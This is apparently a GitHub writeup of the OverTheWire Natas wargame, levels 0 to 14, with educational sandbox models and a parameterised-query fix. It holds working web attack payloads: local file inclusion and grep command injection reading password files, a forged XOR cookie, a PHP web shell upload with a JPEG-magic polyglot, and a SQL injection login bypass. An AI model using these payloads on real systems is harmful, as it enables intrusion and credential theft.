vaezim/OverTheWire-Writeups

Natas writeup

Levels (each entry is the step that takes you from that level to the next)

  0. View the page source (Ctrl + U).
  1. Same as level 0: right-click is disabled, but Ctrl + U still shows the source.
  2. Open url + /files and look at the directory listing.
  3. Read url + /robots.txt, then visit the disallowed directory url + /s3cr3t/.
  4. Edit the Referer header so the request appears to come from the natas5 page.

  5. Set the login cookie to 1 (`loggedin=1`; PHP cookie names are case-sensitive).

  6. Read url + includes/secret.inc (the include path is visible in the page source) and submit the secret it contains.
  7. Local file inclusion through the page parameter: url + index.php?page=/etc/natas_webpass/natas8
  8. Decode the encoded secret by inverting the server's encodeSecret() (hex-decode, reverse, base64-decode) and submit the result:

     ```php
     <?php
     $encodedSecret = "3d3d516343746d4d6d6c315669563362";

     // Inverse of the level's encodeSecret(): bin2hex(strrev(base64_encode($secret)))
     function decodeSecret($encodedSecret) {
         return base64_decode(strrev(hex2bin($encodedSecret)));
     }

     echo decodeSecret($encodedSecret);
     echo "\n";
     ?>
     ```

  9. Command injection: the search term is spliced into `grep -i $key dictionary.txt`, so entering `a /etc/natas_webpass/natas10;` makes grep read the password file instead of the dictionary (the `;` ends the command, and the leftover `dictionary.txt` fails harmlessly). grep only prints lines matching the pattern, so use a character that certainly occurs in the password, or `.` to match any line.
  10. Same injection, but `;`, `|` and `&` are filtered. No separator is needed: `a /etc/natas_webpass/natas11` simply adds the password file to grep's file list.
  11. The cookie is XOR-encrypted JSON with an unknown repeating key. The default data is known, so XOR the plaintext JSON with the decoded cookie to recover the key stream, then set $default_data["showpassword"] = "yes" and re-encrypt with the recovered key:

      ```php
      <?php
      // Repeating-key XOR, identical to the server-side function (XOR is its own inverse)
      function xor_encrypt($text, $key) {
          $outText = '';
          for ($i = 0; $i < strlen($text); $i++) {
              $outText .= $text[$i] ^ $key[$i % strlen($key)];
          }
          return $outText;
      }

      // Known plaintext: the defaults the server encodes, and the cookie it handed out
      $default_data = array("showpassword" => "no", "bgcolor" => "#ffffff");
      $cookie_data = "MGw7JCQ5OC04PT8jOSpqdmkgJ25nbCorKCEkIzlscm5oKC4qLSgpbjY=";

      // plaintext XOR ciphertext = the key, repeated over the whole length
      $xor_key = xor_encrypt(json_encode($default_data), base64_decode($cookie_data));
      $xor_key = substr($xor_key, 0, 4); // the stream repeats every 4 bytes: KNHL

      // Set showpassword => yes and encrypt it with the recovered key
      $default_data["showpassword"] = "yes";
      $new_cookie_data = base64_encode(xor_encrypt(json_encode($default_data), $xor_key));
      echo $new_cookie_data;
      echo "\n";
      ?>
      ```

      URL-encode the forged value before putting it in the cookie: base64 output can contain `+` and `=`, and PHP URL-decodes cookie values, so a raw `+` would arrive as a space.

  12. Upload a PHP file that prints the output of `cat /etc/natas_webpass/natas13`:

      ```php
      <?php
      exec("cat /etc/natas_webpass/natas13", $output);
      print_r($output[0]);
      ?>
      ```

      The server names the stored file after the hidden `filename` form field, not after the uploaded file, so change that field's value to a name ending in `.php` before submitting, then open the link to the uploaded file.

  13. This level rejects uploads that do not look like an image (it checks the file's magic bytes), so put the JPEG magic number ff d8 ff e0 at the start of the file, before the PHP code:

      ```python
      # Build a JPEG/PHP polyglot: the magic bytes satisfy the image check, and
      # PHP just echoes them, since they sit outside the <?php ... ?> tags.
      jpeg_magic_number = b"\xff\xd8\xff\xe0"
      php_code = (
          b'<?php\n'
          b'exec("cat /etc/natas_webpass/natas14", $output);\n'
          b'print_r($output[0]);\n'
          b'?>\n'
      )

      # One binary write, so no text-mode newline translation touches the payload
      with open("./natas13.php", "wb") as f:
          f.write(jpeg_magic_number + php_code)
      ```

      The rest is the same as level 12.
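An added example, not the writeup's code, that builds the level 12 and 13 upload in Python and models the two server-side decisions the steps above rely on: the stored file's extension comes from the client-supplied filename field (level 12), and level 13 only inspects the leading magic bytes (modelled on PHP's exif_imagetype(), which recognises a JPEG by its first three bytes ff d8 ff). The `server_*` and `simulate_upload` functions are my assumptions for illustration, not the level's implementation.

```python
import os
import secrets
from typing import Optional

# Constructed payload: the PHP the writeup uploads to read the natas14 password
PHP_PAYLOAD = (
    b'<?php\n'
    b'exec("cat /etc/natas_webpass/natas14", $output);\n'
    b'print_r($output[0]);\n'
    b'?>\n'
)

# ff d8 is the JPEG start-of-image marker, ff e0 the APP0 (JFIF) marker that usually follows
JPEG_PREFIX = b"\xff\xd8\xff\xe0"


def build_polyglot(php_code: bytes, prefix: bytes = JPEG_PREFIX) -> bytes:
    """Prepend the JPEG magic bytes. PHP interprets only the text inside
    <?php ... ?> and echoes everything else verbatim, so the script still runs."""
    return prefix + php_code


def write_polyglot(path: str, php_code: bytes = PHP_PAYLOAD) -> int:
    """Write the polyglot in one binary write; returns the number of bytes written."""
    data = build_polyglot(php_code)
    with open(path, "wb") as f:
        f.write(data)
    return len(data)


# --- assumed models of the server side, for illustration only ---

def server_is_image(data: bytes) -> bool:
    """Model of level 13's check: exif_imagetype() accepts a JPEG on its first
    three bytes ff d8 ff and never looks at the rest of the file."""
    return data[:3] == b"\xff\xd8\xff"


def server_stored_path(upload_dir: str, client_filename: str) -> str:
    """Model of makeRandomPathFromFilename(): random basename, but the extension
    is taken from the client-supplied 'filename' field, so '.php' survives."""
    ext = os.path.splitext(client_filename)[1]
    return f"{upload_dir}/{secrets.token_hex(5)}{ext}"


def simulate_upload(data: bytes, client_filename: str, check_image: bool) -> Optional[str]:
    """Path the server would store the upload at, or None if the image check rejects it.
    check_image=False models level 12, check_image=True models level 13."""
    if check_image and not server_is_image(data):
        return None
    return server_stored_path("upload", client_filename)


if __name__ == "__main__":
    write_polyglot("./natas13.php")
    print(simulate_upload(build_polyglot(PHP_PAYLOAD), "natas13.php", check_image=True))
```

The magic-byte check and the extension choice are independent, which is the whole weakness: the check looks at the first bytes of the content while the extension that decides whether the file is executed comes from a field the client controls.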

  14. SQL injection in the login form. Adding a `debug` key to the query string makes the page print the query it executes, which is useful for checking the payload. Log in with username `" or true; -- ` (the trailing space is part of the payload: MySQL requires whitespace after `--` for a comment) and any password.
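An added example (not the writeup's code) that reproduces the level 14 query construction against an in-memory SQLite table with one constructed user row, to show why the `" or true; -- ` username logs in regardless of password, what the `debug` output would show, and the parameterised form that closes the hole. It assumes an SQLite build with the default double-quoted-string setting and version 3.23 or later (the TRUE keyword), so that it parses the double-quoted literals and `-- ` comment the same way MySQL does on the real level.

```python
import sqlite3

# The page's payload; the trailing space is part of it
PAYLOAD_USERNAME = '" or true; -- '


def build_query(username: str, password: str) -> str:
    """String-built query shaped like level 14's. This is the text the page
    prints back when the 'debug' key is present in the query string."""
    return ('SELECT * from users where username="' + username
            + '" and password="' + password + '"')


def make_db() -> sqlite3.Connection:
    """Constructed users table with one row (the secret is made up)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('natas15', 'constructed-secret')")
    conn.commit()
    return conn


def vulnerable_login(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Level-14 style: user input becomes SQL syntax. The injected '" or true'
    makes the WHERE clause always true and '-- ' comments out the password check."""
    return conn.execute(build_query(username, password)).fetchone() is not None


def safe_login(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Parameterised version: the same input is only ever compared as a string value."""
    row = conn.execute(
        "SELECT * FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row is not None


if __name__ == "__main__":
    conn = make_db()
    print("debug:", build_query(PAYLOAD_USERNAME, "anything"))
    print("vulnerable login:", vulnerable_login(conn, PAYLOAD_USERNAME, "anything"))
    print("parameterised login:", safe_login(conn, PAYLOAD_USERNAME, "anything"))
```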

About

Writeups for OverTheWire wargames
